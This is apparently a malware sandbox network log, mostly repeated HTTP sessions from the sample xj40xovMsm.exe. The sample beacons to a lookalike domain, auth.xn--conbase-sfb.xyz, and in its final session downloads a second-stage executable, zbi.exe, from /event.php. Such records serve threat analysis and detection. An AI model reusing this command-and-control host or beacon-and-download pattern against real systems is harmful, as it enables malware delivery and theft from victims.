                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                125192.168.2.449943188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:09.320698023 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:09.325532913 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:10.067461014 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:10 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PGwspBBiofhk8wYp%2F2KF3QeWH5YZG4HuSby93Mq8LSCSOoy2anah%2Bk%2BT5tU7E0iXFyXcR6k3U0Em2fWvVY2uAplpD6eNyKRfIPuceP4hkJpjdaqJNc57VYmA26d5%2F5MEkVZzP2TQukniQ30%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4163ec5cc472-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                126192.168.2.449944188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:10.180094004 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:10.185750961 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:11.092449903 CEST615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:11 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LzfoVlOtyEWwpxP5B4fpEsYrVtRtEAlhsQlPzX10O%2FHFBUyKQMoPrdmdSVmMsEiM%2BwOObLf7y0nufDHqWAPoYEW36eaHrNQLOLwMrErCtnJzFtetgABojD5c2M2b1r5C7Er8TbPcfLCv0Mg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef41693cc60f73-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                127192.168.2.449945188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:11.211433887 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:11.216335058 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.040713072 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:11 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MVDFjCGvacVHYzq%2FFSmllmAVllAURALn3r%2Fue7ASl4WKr29zlI5z77DQ2ArojJEgCl05kBSlZNC%2Bwxqc0oP0LkVP7BrQFvJYD7LWIzUdjc%2FqMFf9nUL3JwBxdtYJKbs%2Fvqo64aRi6yzXUzo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef416faed34308-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                128192.168.2.449947188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.148825884 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:12.158108950 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:16.160640001 CEST623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:16 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tuaYb9TOE3zviCgFxUAioTozf0EbMCv3tmUrS5I4ilqqjqhpNIfouUl8%2B%2B4wPl%2BHvHOr3%2FoTt7%2Fs6zE8tAcWvFgMtT7oq03ai3DYJr9GWy8JT%2BRrwZNyj35MiRXM3BkfU7uUI0tEnMWZMPs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4175ae7642e7-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                129192.168.2.449949188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:16.276870966 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:16.283997059 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:17.007226944 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:16 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BIm5FdBPuKadRGX8CxCy5FV6Hpviu7czbn%2BtGJqbkgEraKpeZyZDPd3DdR0%2FCbYYPIhdzfgi13b1EpKZzb4MfqYa%2FpjOFjmPFpYK4HCKk3hi%2F46yYlhd0NpBDQSY1x9Du5lMwiw27rH8lZM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef418f6ec87c99-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                130192.168.2.449950188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:17.117980957 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:17.122773886 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.337018013 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:18 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7fNeCfTS7ilAH0YH1ymrrzaXKert98XLzQ8XcQLH4Nwap9Zjcj1Q7RCCpm7PLlYP8%2B3LXm34zK%2B8kb0UsjexXTztiICsFu9S%2Bgmns1rub8XSTpXhyxaEepTodHpA7BNABeYynHGCQhKBF1Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef419499b38ca5-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                131192.168.2.449951188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.447887897 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:18.453773975 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:19.411593914 CEST615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:19 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mQhRUnbirjbAz3rMy55TJy%2BFXNpqNHvOVPJDmodAi3TKumUmtfKrHgkmXyVhDz6Lor01Y1bPTxIau56A1iwXZ5Jwa8rQtL3i3uuGCE1aShQwZp%2B8Qfam3JhWBnD1xzMdl2rTjT3Ypgd5Zpc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef419ceb6b7c87-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                132192.168.2.449953188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:19.523977041 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:19.529475927 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.203171015 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:20 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PLxpPmPFZ9QHWUU0S%2FHMKbZqcRcyj0tMWb272STv%2Bk37R39z2C05PhbTBNVcc0sX6QwMqOYS4bV0ReNoK77%2F6VI3hJXNwnuOl7DD%2Fw2esElB43AEn6r0IL8MnYVRfpPKLRJFD%2FFRIu2SPak%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef41a3bd968c96-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                133192.168.2.449954188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.361651897 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:20.366750956 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:21.131361008 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:21 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RtKBo%2BbCEYO%2BKaAEir1icxSLMtPp2B1xHFDTZAUQIL%2FWS7%2FJAgrne7vVbYeVEa6YkMeTSiZ5ntEQERDm5aCYpFV3hAmhIctYd%2BHR6hemeOzr3sh0riTcjPbOneiGGdSplTMMehr8Ko3Y324%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef41a8e90f728f-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                134192.168.2.449955188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:21.262339115 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:21.267172098 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:22.045747995 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:21 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V9dJSZt3N%2FKAlvhB8IlChxQotNtBNg%2FgDt6KlTH07dg2evb6w0chCoWCzNy930s1ZtuXUZ%2FeiC%2FVNdnKt0LW8B%2FY1MgNgsEeB6HxP1f0rwVLgKJrkp04X0WIH3geNfCQh8kwbHUoKrLX1fw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef41ae7cfd18b4-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                135192.168.2.449956188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:22.166191101 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:22.174037933 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.021195889 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:22 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wkq6A4Lfu0w3mFAn1pv3wd1bf%2FVADDzhUB9xxPWzLywWIQ8jVUNC4tShVkXvmUxuPgwXzBgzVVtoXgBNW3QjGhDJB0JCByMF56uoGO64W403OK%2FMB7VoTygrRRpoI%2BTZobaTk77mN5onU8E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef41b40f6ac40c-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                136192.168.2.449957188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.136375904 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.142632008 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.867224932 CEST615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:23 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Czv3XsoSWY7coRG8VU4faArHOUxnCS2olWsTgbTdJ9xT%2FVvv4AUx7w8bcAmuq%2F1fHThTcrVSfjEG0GNP1zMCIXJUM7Z4LfWfA6nZUmTswDlHxk9ZvvChzXl92FP0BMHx9mmxvhLlkxk3voU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef41ba3f860f37-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                137192.168.2.449959188.114.96.380
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.978282928 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:29:23.983269930 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:29:24.789191008 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:24 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7OtkwfGd7QsDjw2JY%2B8G8pUyxCBhelTjG9LOsENi1V%2BG2OFdwVembCM7fSPGPNNZ0Vkq07AkX8iGHEdw7iid2iDB2wxvO2ER%2BtUpFRiqurJXCbGL%2B3dbwL7lluepwPzli4jxOIQmnLjm5d4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef41bf68e44262-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.2.449730188.114.97.34436784C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:26:57 UTC109OUTGET /event.php HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla 5/0
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-07-06 11:26:58 UTC661INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:26:58 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Disposition: inline; filename="zbi.exe"
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BoOdB3dbf5t7gKRbq9mXlDnKFnnfHioAENAIWqhxAmHXXGMihQjcTUK6mj7low6YQ4%2FuEIbdLjtG5lOA1WN5rA57C%2BggpVEyIathfyLrSkK5YuZoTwPsXD6XhgWkmIfCDpLxena%2FH1a2fsI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3e2bce6042d1-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
